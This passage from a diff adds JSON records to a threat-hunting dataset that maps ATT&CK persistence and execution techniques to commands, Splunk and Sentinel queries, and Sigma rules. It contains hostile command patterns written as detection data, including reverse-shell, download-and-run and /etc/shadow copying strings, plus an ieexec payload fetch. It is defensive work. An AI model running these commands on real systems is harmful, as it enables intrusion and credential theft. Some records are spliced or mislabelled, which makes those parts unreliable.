"T1168", + "ATT&CK Technique #2": "", + "Technique": "Local Job Scheduling", + "Concatenate for Python Dictionary": "\"python/persistence/multi/crontab\": [\"T1168\"]," + } + ], + "queries": [ + { + "product": "Splunk", + "query": "1. bash_history : track the command \"crontab\" - you may need to look for the commands crontab ", + "name": "" + }, + { + "product": "Splunk", + "query": "", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=bash_history bash_command=\"crontab *\" | table host, user_name, bash_command", + "name": "" + }, + { + "product": "Splunk", + "query": "2. /var/log/cron : look for \"crontab\" & \"REPLACE\" in the cron logs", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux crontab replace", + "name": "" + }, + { + "product": "Splunk", + "query": "3. /var.log/cron - track CMD command", + "name": "" + }, + { + "product": "Splunk", + "query": "cat /var/log/cron | grep CMD | cut -d \" \" -f 9 |sort | uniq -c | sort -rn will give you all the jobs which run in the environment with its number starting from high to low. You can look for a suspecious job/s which are not a part of a whitelisted jobs.", + "name": "" + }, + { + "product": "Splunk", + "query": "4. index=linux sourcetype=bash_history at", + "name": "" + } + ], + "possible_detections": [ + "/var/log/cron", + "bash_history" + ], + "external_reference": [] + }, + { + "technique_id": "T1158", + "command_list": [ + "attrib.exe +s +h * appdata", + "```", + "mkdir .hidden-directory", + "mv file to a .file" + ], + "commands": [ + { + "command": "attrib.exe +s +h * appdata", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "```", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "mkdir .hidden-directory", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "mv file to a .file", + "source": "Kirtar22/Litmus_Test", + "name": "" + } + ], + "parsed_datasets": [ + { + "chain_id": "100207", + "os": "windows", + "parent_process": "attrib.exe", + "commandline_string": "+s +h * appdata", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "hidden_files_dirs", + "mitre_attack": "T1158", + "itw_sample": "62b623a8dd6f7bfa7d1cff7b9db19f948840f36bee5c9063eaf5b898beb23c68" + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1and process_path contains \"attrib.exe\"and (process_command_line contains \"+h\"or process_command_line contains \"+s\")", + "name": "Hidden Files And Directories" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1and (process_path contains \"*\\\\VolumeShadowCopy*\\\\*\"or process_command_line contains \"*\\\\VolumeShadowCopy*\\\\*\")", + "name": "Hidden Files And Directories VSS" + }, + { + "product": "Splunk", + "query": "There are 2 ways by which we can capture this", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=bash_history bash_command=\"mkdir .*\" | table host,user_name,bash_command", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=bash_history bash_command=\"mv * .*\" | table host,user_name,bash_command", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "find_hidden_files.sh script can be run on a regular interval and check for any suspecious file creation. A whitelist can be craeted to filter out the standard hidden files/directories in a linux system.", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "find /home/ -name \".*\"", + "name": "" + }, + { + "product": "Splunk", + "query": "find /home/ -type d -name \".*\"", + "name": "" + }, + { + "product": "Splunk", + "query": "find /home/ -type f -name \".*\"", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + } + ], + "possible_detections": [ + "bash_history logs", + "find the hidden files/dirs from certain directory paths like (/home/$user) and dump it to a location and ingest the file and look for any malicious hidden files (scripted input to the Splunk)", + { + "title": "Hiding files with attrib.exe", + "id": "4281cb20-2994-4580-aa63-c8b86d019934", + "status": "experimental", + "description": "Detects usage of attrib.exe to hide files from users.", + "author": "Sami Ruohonen", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": "*\\attrib.exe", + "CommandLine": "* +h *" + }, + "ini": { + "CommandLine": "*\\desktop.ini *" + }, + "intel": { + "ParentImage": "*\\cmd.exe", + "CommandLine": "+R +H +S +A \\\\*.cui", + "ParentCommandLine": "C:\\WINDOWS\\system32\\\\*.bat" + }, + "condition": "selection and not (ini or intel)" + }, + "fields": [ + "CommandLine", + "ParentCommandLine", + "User" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1158" + ], + "falsepositives": [ + "igfxCUIService.exe hiding *.cui files via .bat script (attrib.exe a child of cmd.exe and igfxCUIService.exe is the parent of the cmd.exe)", + "msiexec.exe hiding desktop.ini" + ], + "level": "low" + }, + [ + "4663", + "File monitoring" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "LMD", + "Hash Compae" + ], + [ + "4663", + "File monitoring" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "LOG-MD", + "Hash Compae" + ] + ], + "external_reference": [ + "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/", + "https://securingtomorrow.mcafee.com/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/", + "https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/", + "https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/" + ] + }, + { + "technique_id": "T1191", + "command_list": [ + "winword.exe", + "cmstp.exe", + "cmstp.exe/s|/ns|/au" + ], + "commands": [ + { + "command": "winword.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "cmstp.exe", + "source": "Threat Hunting Tables", + "name": "sub_process_1" + }, + { + "command": "cmstp.exe/s|/ns|/au", + "source": "SysmonHunter - CMSTP", + "name": "" + } + ], + "parsed_datasets": [ + { + "chain_id": "100210", + "os": "windows", + "parent_process": "winword.exe", + "commandline_string": "", + "sub_process_1": "cmstp.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "cmstp", + "mitre_attack": "T1191", + "itw_sample": "" + }, + { + "name": "CMSTP", + "description": null, + "level": "medium", + "phase": "Execution", + "query": [ + { + "type": "process", + "process": { + "image": { + "pattern": "cmstp.exe" + }, + "cmdline": { + "pattern": "/s|/ns|/au" + } + } + } + ] + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1and process_path contains \"CMSTP.exe\"", + "name": "CMSTP" + } + ], + "possible_detections": [ + { + "action": "global", + "title": "CMSTP Execution", + "id": "9d26fede-b526-4413-b069-6e24b6d07167", + "status": "stable", + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1191", + "attack.g0069", + "car.2019-04-001" + ], + "author": "Nik Seetharaman", + "references": [ + "http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/" + ], + "detection": { + "condition": "1 of them" + }, + "fields": [ + "CommandLine", + "ParentCommandLine", + "Details" + ], + "falsepositives": [ + "Legitimate CMSTP use (unlikely in modern enterprise environments)" + ], + "level": "high" + }, + { + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection2": { + "EventID": 12, + "TargetObject": "*\\cmmgr32.exe*" + }, + "selection3": { + "EventID": 13, + "TargetObject": "*\\cmmgr32.exe*" + }, + "selection4": { + "EventID": 10, + "CallTrace": "*cmlua.dll*" + } + } + }, + { + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection1": { + "ParentImage": "*\\cmstp.exe" + } + } + }, + { + "title": "CMSTP UAC Bypass via COM Object Access", + "id": "4b60e6f2-bf39-47b4-b4ea-398e33cfe253", + "status": "stable", + "description": "Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects", + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.execution", + "attack.t1088", + "attack.t1191", + "attack.g0069", + "car.2019-04-001" + ], + "author": "Nik Seetharaman", + "modified": "2019/07/31", + "references": [ + "http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", + "https://twitter.com/hFireF0X/status/897640081053364225" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection1": { + "ParentCommandLine": "*\\DllHost.exe" + }, + "selection2": { + "ParentCommandLine": [ + "*{3E5FC7F9-9A51-4367-9063-A120244FBEC7}", + "*{3E000D72-A845-4CD9-BD83-80C07C3B881F}" + ] + }, + "condition": "selection1 and selection2" + }, + "fields": [ + "CommandLine", + "ParentCommandLine", + "Hashes" + ], + "falsepositives": [ + "Legitimate CMSTP use (unlikely in modern enterprise environments)" + ], + "level": "high" + }, + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ] + ], + "external_reference": [ + "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html", + "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", + "https://blog.morphisec.com/cobalt-gang-2.0" + ] + }, + { + "technique_id": "T1100", + "command_list": [ + "ieexec.exe http://*:8080/bypass.exe" + ], + "commands": [ + { + "command": "ieexec.exe http://*:8080/bypass.exe", + "source": "Threat Hunting Tables", + "name": "" + } + ], + "parsed_datasets": [ + { + "chain_id": "100211", + "os": "windows", + "parent_process": "ieexec.exe", + "commandline_string": "http://*:8080/bypass.exe", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "web_shell", + "mitre_attack": "T1100", + "itw_sample": "https://github.com/api0cradle/LOLBAS/blob/master/OSBinaries/Ieexec.md" + }, + { + "Rules": "ET Open", + "SID": "*", + "Signature": "ET WEB_SERVER ATTACKER WebShell", + "Verified": "Yes" + } + ], + "queries": [ + { + "product": "Suricata (NSM)", + "query": "ET WEB_SERVER ATTACKER WebShell", + "name": "ET Open Rule" + } + ], + "possible_detections": [ + { + "title": "Antivirus Web Shell Detection", + "id": "fdf135a2-9241-4f96-a114-bb404948f736", + "description": "Detects a highly relevant Antivirus alert that reports a web shell", + "date": "2018/09/09", + "modified": "2019/10/04", + "author": "Florian Roth", + "references": [ + "https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/" + ], + "tags": [ + "attack.persistence", + "attack.t1100" + ], + "logsource": { + "product": "antivirus" + }, + "detection": { + "selection": { + "Signature": [ + "PHP/Backdoor*", + "JSP/Backdoor*", + "ASP/Backdoor*", + "Backdoor.PHP*", + "Backdoor.JSP*", + "Backdoor.ASP*", + "*Webshell*" + ] + }, + "condition": "selection" + }, + "fields": [ + "FileName", + "User" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "critical" + }, + { + "title": "Webshell Remote Command Execution", + "id": "c0d3734d-330f-4a03-aae2-65dacc6a8222", + "status": "experimental", + "description": "Detects posible command execution by web application/web shell", + "tags": [ + "attack.persistence", + "attack.t1100" + ], + "references": [ + "personal experience" + ], + "author": "Ilyas Ochkov, Beyu Denis, oscd.community", + "date": "2019/10/12", + "modified": "2019/11/04", + "logsource": { + "product": "linux", + "service": "auditd" + }, + "detection": { + "selection": { + "type": "SYSCALL", + "SYSCALL": "execve", + "key": "detect_execve_www" + }, + "condition": "selection" + }, + "falsepositives": [ + "Admin activity", + "Crazy web applications" + ], + "level": "critical" + }, + { + "title": "Windows webshell creation", + "id": "39f1f9f2-9636-45de-98f6-a4046aa8e4b9", + "status": "experimental", + "description": "Posible webshell file creation on a static web site", + "references": [ + "PT ESC rule and personal experience" + ], + "author": "Beyu Denis, oscd.community", + "date": "2019/10/22", + "modified": "2019/11/04", + "tags": [ + "attack.persistence", + "attack.t1100" + ], + "level": "critical", + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection_1": { + "EventID": 11 + }, + "selection_2": { + "TargetFilename|contains": "\\inetpub\\wwwroot\\" + }, + "selection_3": { + "TargetFilename|contains": [ + ".asp", + ".ashx", + ".ph" + ] + }, + "selection_4": { + "TargetFilename|contains": [ + "\\www\\", + "\\htdocs\\", + "\\html\\" + ] + }, + "selection_5": { + "TargetFilename|contains": ".ph" + }, + "selection_6": [ + { + "TargetFilename|contains|all": [ + "\\", + ".jsp" + ] + }, + { + "TargetFilename|contains|all": [ + "\\cgi-bin\\", + ".pl" + ] + } + ], + "condition": "selection_1 and ( selection_2 and selection_3 ) or selection_1 and ( selection_4 and selection_5 ) or selection_1 and selection_6" + }, + "falsepositives": [ + "Legitimate administrator or developer creating legitimate executable files in a web application folder" + ] + }, + { + "title": "Execution in Webserver Root Folder", + "id": "35efb964-e6a5-47ad-bbcd-19661854018d", + "status": "experimental", + "description": "Detects a suspicious program execution in a web service root folder (filter out false positives)", + "author": "Florian Roth", + "tags": [ + "attack.persistence", + "attack.t1100" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": [ + "*\\wwwroot\\\\*", + "*\\wmpub\\\\*", + "*\\htdocs\\\\*" + ] + }, + "filter": { + "Image": [ + "*bin\\\\*", + "*\\Tools\\\\*", + "*\\SMSComponent\\\\*" + ], + "ParentImage": [ + "*\\services.exe" + ] + }, + "condition": "selection and not filter" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "falsepositives": [ + "Various applications", + "Tools that include ping or nslookup command invocations" + ], + "level": "medium" + }, + { + "title": "IIS Native-Code Module Command Line Installation", + "id": "9465ddf4-f9e4-4ebd-8d98-702df3a93239", + "description": "Detects suspicious IIS native-code module installations via command line", + "status": "experimental", + "references": [ + "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/" + ], + "author": "Florian Roth", + "modified": "2012/12/11", + "tags": [ + "attack.persistence", + "attack.t1100" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": [ + "*\\APPCMD.EXE install module /name:*" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown as it may vary from organisation to arganisation how admins use to install IIS modules" + ], + "level": "medium" + }, + { + "title": "Webshell Detection With Command Line Keywords", + "id": "bed2a484-9348-4143-8a8a-b801c979301c", + "description": "Detects certain command line parameters often used during reconnaissance activity via web shells", + "author": "Florian Roth", + "reference": [ + "https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html" + ], + "date": "2017/01/01", + "modified": "2019/10/26", + "tags": [ + "attack.privilege_escalation", + "attack.persistence", + "attack.t1100" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "ParentImage": [ + "*\\apache*", + "*\\tomcat*", + "*\\w3wp.exe", + "*\\php-cgi.exe", + "*\\nginx.exe", + "*\\httpd.exe" + ], + "CommandLine": [ + "*whoami*", + "*net user *", + "*ping -n *", + "*systeminfo", + "*&cd&echo*", + "*cd /d*" + ] + }, + "condition": "selection" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "falsepositives": [ + "unknown" + ], + "level": "high" + }, + { + "title": "Shells Spawned by Web Servers", + "id": "8202070f-edeb-4d31-a010-a26c72ac5600", + "status": "experimental", + "description": "Web servers that spawn shell processes could be the result of a successfully placed web shell or an other attack", + "author": "Thomas Patzke", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "ParentImage": [ + "*\\w3wp.exe", + "*\\httpd.exe", + "*\\nginx.exe", + "*\\php-cgi.exe" + ], + "Image": [ + "*\\cmd.exe", + "*\\sh.exe", + "*\\bash.exe", + "*\\powershell.exe" + ] + }, + "condition": "selection" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "tags": [ + "attack.privilege_escalation", + "attack.persistence", + "attack.t1100" + ], + "falsepositives": [ + "Particular web applications may spawn a shell process legitimately" + ], + "level": "high" + }, + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "4624", + " 4625", + "Authentication logs" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "Anti-virus" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "4624", + " 4625", + "Authentication logs" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "Anti-virus" + ] + ], + "external_reference": [ + "https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/", + "https://www.brighttalk.com/webcast/10703/296317/apt34-new-targeted-attack-in-the-middle-east", + "https://www.us-cert.gov/ncas/alerts/TA17-293A", + "https://pan-unit42.github.io/playbook_viewer/", + "https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html", + "http://www.crowdstrike.com/blog/mo-shells-mo-problems-deep-panda-web-shells/", + "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html" + ] + }, + { + "technique_id": "T1101", + "command_list": [ + "caspol.exe -s off", + "SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages|SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security Packages", + "powershell/persistence/misc/get_ssps", + "powershell/persistence/misc/install_ssp", + "powershell/persistence/misc/memssp" + ], + "commands": [ + { + "command": "caspol.exe -s off", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages|SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security Packages", + "source": "SysmonHunter - Security Support Provider", + "name": "" + }, + { + "command": "powershell/persistence/misc/get_ssps", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/persistence/misc/install_ssp", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/persistence/misc/memssp", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "chain_id": "100212", + "os": "windows", + "parent_process": "caspol.exe", + "commandline_string": "-s off", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "web_shell", + "mitre_attack": "T1101", + "itw_sample": "https://github.com/api0cradle/LOLBAS/blob/master/OSBinaries/Ieexec.md" + }, + { + "name": "Security Support Provider", + "description": null, + "level": "medium", + "phase": "Persistence", + "query": [ + { + "type": "reg", + "reg": { + "path": { + "pattern": "SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages|SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security Packages" + } + } + }, + { + "type": "process", + "process": { + "cmdline": { + "pattern": "SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages|SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security Packages" + } + } + } + ] + }, + { + "Empire Module": "powershell/persistence/misc/get_ssps", + "ATT&CK Technique #1": "T1101", + "ATT&CK Technique #2": "", + "Technique": "Security Support Provider", + "Concatenate for Python Dictionary": "\"powershell/persistence/misc/get_ssps\": [\"T1101\"]," + }, + { + "Empire Module": "powershell/persistence/misc/install_ssp", + "ATT&CK Technique #1": "T1101", + "ATT&CK Technique #2": "", + "Technique": "Security Support Provider", + "Concatenate for Python Dictionary": "\"powershell/persistence/misc/install_ssp\": [\"T1101\"]," + }, + { + "Empire Module": "powershell/persistence/misc/memssp", + "ATT&CK Technique #1": "T1101", + "ATT&CK Technique #2": "", + "Technique": "Security Support Provider", + "Concatenate for Python Dictionary": "\"powershell/persistence/misc/memssp\": [\"T1101\"]," + } + ], + "queries": [], + "possible_detections": [ + [ + "4657", + "Windows Registry" + ], + [ + "Loaded DLLs" + ], + [ + "DLL monitoring" + ], + [ + "Sysmon ID 7", + "DLL monitoring" + ], + [ + "4657", + "Windows Registry" + ], + [ + "Sysmon ID 7", + "Loaded DLLs" + ] + ], + "external_reference": [] + }, + { + "technique_id": "T1042", + "command_list": [ + "\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\FileExts|HKCR\\\\.+\\\\shell\\\\open\\\\commandWindows\\Explorer.EXE", + "assoc.exe" + ], + "commands": [ + { + "command": "\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\FileExts|HKCR\\\\.+\\\\shell\\\\open\\\\commandWindows\\Explorer.EXE", + "source": "SysmonHunter - Change Default File Association", + "name": "" + }, + { + "command": "assoc.exe", + "source": "SysmonHunter - Change Default File Association", + "name": "" + } + ], + "parsed_datasets": [ + { + "name": "Change Default File Association", + "description": null, + "level": "medium", + "phase": "Persistence", + "query": [ + { + "type": "reg", + "reg": { + "path": { + "pattern": "\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\FileExts|HKCR\\\\.+\\\\shell\\\\open\\\\command", + "flag": "regex" + } + }, + "process": { + "image": { + "pattern": "Windows\\Explorer.EXE", + "op": "not" + } + }, + "op": "and" + }, + { + "type": "process", + "process": { + "any": { + "pattern": "assoc.exe" + } + } + } + ] + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where (EventID == 12 or EventID == 13 or EventID == 14)and (registry_key_path contains \"\\\\SOFTWARE\\\\Classes\\\\\"or registry_key_path contains \"\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\GlobalAssocChangedCounter\")", + "name": "Change Default File Association" + } + ], + "possible_detections": [ + { + "title": "Change Default File Association", + "id": "3d3aa6cd-6272-44d6-8afc-7e88dfef7061", + "status": "experimental", + "description": "When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.", + "author": "Timur Zinniatullin, oscd.community", + "date": "2019/10/21", + "modified": "2019/11/04", + "references": [ + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1042/T1042.yaml" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine|contains|all": [ + "cmd", + "/c", + "assoc" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Admin activity" + ], + "fields": [ + "Image", + "CommandLine", + "User", + "LogonGuid", + "Hashes", + "ParentProcessGuid", + "ParentCommandLine" + ], + "level": "low", + "tags": [ + "attack.persistence", + "attack.t1042" + ] + }, + [ + "4657", + "Windows Registry" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ] + ], + "external_reference": [] + }, + { + "technique_id": "T1059", + "command_list": [ + "\\\\Windows\\\\.+\\\\cmd.exe", + "cmd.exe|/c", + "powershell/lateral_movement/invoke_sqloscmd", + "powershell/management/spawnas" + ], + "commands": [ + { + "command": "\\\\Windows\\\\.+\\\\cmd.exe", + "source": "SysmonHunter - Command-Line Interface", + "name": "" + }, + { + "command": "cmd.exe|/c", + "source": "SysmonHunter - Command-Line Interface", + "name": "" + }, + { + "command": "powershell/lateral_movement/invoke_sqloscmd", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/management/spawnas", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "name": "Command-Line Interface", + "description": null, + "level": "medium", + "phase": "Execution", + "query": [ + { + "type": "process", + "process": { + "image": { + "pattern": "\\\\Windows\\\\.+\\\\cmd.exe", + "flag": "regex" + } + } + }, + { + "type": "process", + "process": { + "cmdline": { + "pattern": "cmd.exe|/c", + "op": "and" + } + } + } + ] + }, + { + "Empire Module": "powershell/lateral_movement/invoke_sqloscmd", + "ATT&CK Technique #1": "T1059", + "ATT&CK Technique #2": "", + "Technique": "Command-Line Interface", + "Concatenate for Python Dictionary": "\"powershell/lateral_movement/invoke_sqloscmd\": [\"T1059\"]," + }, + { + "Empire Module": "powershell/management/spawnas", + "ATT&CK Technique #1": "T1059", + "ATT&CK Technique #2": "", + "Technique": "Command-Line Interface", + "Concatenate for Python Dictionary": "\"powershell/management/spawnas\": [\"T1059\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and process_path contains \"cmd.exe\"", + "name": "Command Line Interface" + } + ], + "possible_detections": [ + { + "title": "Equation Group Indicators", + "id": "41e5c73d-9983-4b69-bd03-e13b67e9623c", + "description": "Detects suspicious shell commands used in various Equation Group scripts and tools", + "references": [ + "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" + ], + "tags": [ + "attack.execution", + "attack.g0020", + "attack.t1059" + ], + "author": "Florian Roth", + "logsource": { + "product": "linux" + }, + "detection": { + "keywords": [ + "chown root*chmod 4777 ", + "cp /bin/sh .;chown", + "chmod 4777 /tmp/.scsi/dev/bin/gsh", + "chown root:root /tmp/.scsi/dev/bin/", + "chown root:root x;", + "/bin/telnet locip locport < /dev/console | /bin/sh", + "/tmp/ratload", + "ewok -t ", + "xspy -display ", + "cat > /dev/tcp/127.0.0.1/80 < /dev/null", + "ping -c 2 *; grep * /proc/net/arp >/tmp/gx", + "iptables * OUTPUT -p tcp -d 127.0.0.1 --tcp-flags RST RST -j DROP;", + "> /var/log/audit/audit.log; rm -f .", + "cp /var/log/audit/audit.log .tmp", + "sh >/dev/tcp/* <&1 2>&1", + "ncat -vv -l -p * <", + "nc -vv -l -p * <", + "< /dev/console | uudecode && uncompress", + "sendmail -osendmail;chmod +x sendmail", + "/usr/bin/wget -O /tmp/a http* && chmod 755 /tmp/cron", + "chmod 666 /var/run/utmp~", + "chmod 700 nscd crond", + "cp /etc/shadow /tmp/.", + " /dev/null 2>&1 && uncompress", + "chmod 700 jp&&netstat -an|grep", + "uudecode > /dev/null 2>&1 && uncompress -f * && chmod 755", + "chmod 700 crond", + "wget http*; chmod +x /tmp/sendmail", + "chmod 700 fp sendmail pt", + "chmod 755 /usr/vmsys/bin/pipe", + "chmod -R 755 /usr/vmsys", + "chmod 755 $opbin/*tunnel", + "chmod 700 sendmail", + "chmod 0700 sendmail", + "/usr/bin/wget http*sendmail;chmod +x sendmail;", + "&& telnet * 2>&1 powershell)", + "references": [ + "https://www.hybrid-analysis.com/sample/3a1f01206684410dbe8f1900bbeaaa543adfcd07368ba646b499fa5274b9edf6?environmentId=100", + "https://www.hybrid-analysis.com/sample/f16c729aad5c74f19784a24257236a8bbe27f7cdc4a89806031ec7f1bebbd475?environmentId=100" + ], + "author": "Florian Roth", + "tags": [ + "attack.execution", + "attack.t1059" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": [ + "cmd.exe /c *http://*%AppData%", + "cmd.exe /c *https://*%AppData%" + ] + }, + "condition": "selection" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "falsepositives": [ + "High" + ], + "level": "medium" + }, + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": 